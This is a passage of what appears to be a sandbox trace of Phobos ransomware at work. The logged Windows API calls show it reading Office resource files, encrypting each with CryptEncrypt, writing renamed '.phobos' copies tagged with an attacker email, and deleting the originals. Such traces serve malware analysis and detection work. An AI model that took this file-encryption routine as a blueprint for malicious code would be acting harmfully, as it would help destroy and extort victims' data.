CryptDestroyKey (hKey=0xa327e8) returned 1 [0169.805] CloseHandle (hObject=0x14c) returned 1 [0169.805] CloseHandle (hObject=0x194) returned 1 [0169.805] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\OUTLWVW.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\outlwvw.dll.trx_dll")) returned 1 [0169.806] SetEvent (hEvent=0xe8) returned 1 [0169.806] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0169.807] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\ppintl.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0169.807] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=53600) returned 1 [0169.807] CloseHandle (hObject=0x194) returned 1 [0169.807] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\ppintl.dll.trx_dll")) returned 0x2020 [0169.807] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\ppintl.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0169.807] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\ppintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0169.807] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0169.807] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0169.807] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\ppintl.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0169.808] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa327e8) returned 1 [0169.808] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0169.808] ReadFile (in: hFile=0x194, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xd160, lpOverlapped=0x0) returned 1 [0169.809] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xd170, dwBufLen=0xd170 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xd170) returned 1 [0169.810] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xd170, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xd170, lpOverlapped=0x0) returned 1 [0169.811] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32c68) returned 1 [0169.811] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0169.811] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0169.811] CryptDestroyKey (hKey=0xa32c68) returned 1 [0169.811] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0169.811] CryptDestroyKey (hKey=0xa327e8) returned 1 [0169.811] CloseHandle (hObject=0x194) returned 1 [0169.811] CloseHandle (hObject=0x14c) returned 1 [0169.811] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\ppintl.dll.trx_dll")) returned 1 [0169.812] SetEvent (hEvent=0xe8) returned 1 [0169.812] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0169.813] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\ppintl.rest.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0169.813] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=275808) returned 1 [0169.813] CloseHandle (hObject=0x14c) returned 1 [0169.813] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\ppintl.rest.trx_dll")) returned 0x2020 [0169.813] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\ppintl.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0169.813] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\ppintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0169.813] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0169.813] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0169.813] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\ppintl.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0169.813] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa327e8) returned 1 [0169.813] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0169.813] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x43560, lpOverlapped=0x0) returned 1 [0169.959] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x43570, dwBufLen=0x43570 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x43570) returned 1 [0169.962] WriteFile (in: hFile=0x194, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x43570, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x43570, lpOverlapped=0x0) returned 1 [0169.966] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32c68) returned 1 [0169.966] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0169.966] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0169.966] CryptDestroyKey (hKey=0xa32c68) returned 1 [0169.966] WriteFile (in: hFile=0x194, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0169.967] CryptDestroyKey (hKey=0xa327e8) returned 1 [0169.967] CloseHandle (hObject=0x14c) returned 1 [0169.967] CloseHandle (hObject=0x194) returned 1 [0169.967] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\ppintl.rest.trx_dll")) returned 1 [0169.970] SetEvent (hEvent=0xe8) returned 1 [0169.970] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0169.970] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\pub6intl.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0169.971] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=107872) returned 1 [0169.971] CloseHandle (hObject=0x194) returned 1 [0169.971] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\pub6intl.dll.trx_dll")) returned 0x2020 [0169.971] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\pub6intl.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0169.971] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\pub6intl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0169.971] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0169.971] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0169.971] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\pub6intl.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0169.978] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa327e8) returned 1 [0169.978] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0169.978] ReadFile (in: hFile=0x194, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x1a560, lpOverlapped=0x0) returned 1 [0169.981] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1a570, dwBufLen=0x1a570 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1a570) returned 1 [0169.982] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x1a570, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x1a570, lpOverlapped=0x0) returned 1 [0169.984] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32c68) returned 1 [0169.984] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0169.984] CryptEncrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0169.984] CryptDestroyKey (hKey=0xa32c68) returned 1 [0169.984] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0169.984] CryptDestroyKey (hKey=0xa327e8) returned 1 [0169.984] CloseHandle (hObject=0x194) returned 1 [0169.984] CloseHandle (hObject=0x14c) returned 1 [0169.984] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\pub6intl.dll.trx_dll")) returned 1 [0169.986] SetEvent (hEvent=0xe8) returned 1 [0169.986] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0169.986] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\pub6intl.rest.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0169.986] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=556896) returned 1 [0169.986] CloseHandle (hObject=0x14c) returned 1 [0169.986] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\pub6intl.rest.trx_dll")) returned 0x2020 [0169.986] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\pub6intl.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0169.986] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\pub6intl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0169.986] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0169.986] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0169.986] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\pub6intl.rest.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0169.987] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa327e8) returned 1 [0169.987] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0169.987] ReadFile (in: hFile=0x14c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x87f60, lpOverlapped=0x0) returned 1 [0171.988] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x87f70, dwBufLen=0x87f70 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x87f70) returned 1 [0171.992] WriteFile (in: hFile=0x194, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x87f70, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x87f70, lpOverlapped=0x0) returned 1 [0172.847] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32ca8) returned 1 [0172.847] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0172.847] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0172.847] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0172.847] WriteFile (in: hFile=0x194, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0172.847] CryptDestroyKey (hKey=0xa327e8) returned 1 [0172.847] CloseHandle (hObject=0x14c) returned 1 [0172.847] CloseHandle (hObject=0x194) returned 1 [0172.848] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\pub6intl.rest.trx_dll")) returned 1 [0172.853] SetEvent (hEvent=0xe8) returned 1 [0172.853] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0172.853] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\stintl.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0172.854] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=17248) returned 1 [0172.854] CloseHandle (hObject=0x194) returned 1 [0172.854] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\stintl.dll.trx_dll")) returned 0x2020 [0172.854] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\stintl.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0172.854] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\stintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0172.854] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0172.854] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0172.854] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\stintl.dll.trx_dll.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0172.854] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa327e8) returned 1 [0172.855] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0172.855] ReadFile (in: hFile=0x194, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x4360, lpOverlapped=0x0) returned 1 [0172.887] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x4370, dwBufLen=0x4370 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x4370) returned 1 [0172.887] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x4370, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x4370, lpOverlapped=0x0) returned 1 [0172.888] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32d28) returned 1 [0172.888] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0172.888] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0172.888] CryptDestroyKey (hKey=0xa32d28) returned 1 [0172.889] WriteFile (in: hFile=0x14c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0172.889] CryptDestroyKey (hKey=0xa327e8) returned 1 [0172.889] CloseHandle (hObject=0x194) returned 1 [0172.889] CloseHandle (hObject=0x14c) returned 1 [0172.889] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\STINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\stintl.dll.trx_dll")) returned 1 [0172.890] SetEvent (hEvent=0xe8) returned 1 [0172.890] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0172.890] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\visbrres.dll.trx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x14c [0172.890] GetFileSizeEx (in: hFile=0x14c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=26976) returned 1 [0172.891] CloseHandle (hObject=0x14c) returned 1 [0172.891] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\visbrres.dll.trx_dll")) returned 0x2020 [0172.891] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\VISBRRES.DLL.trx_dll.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: 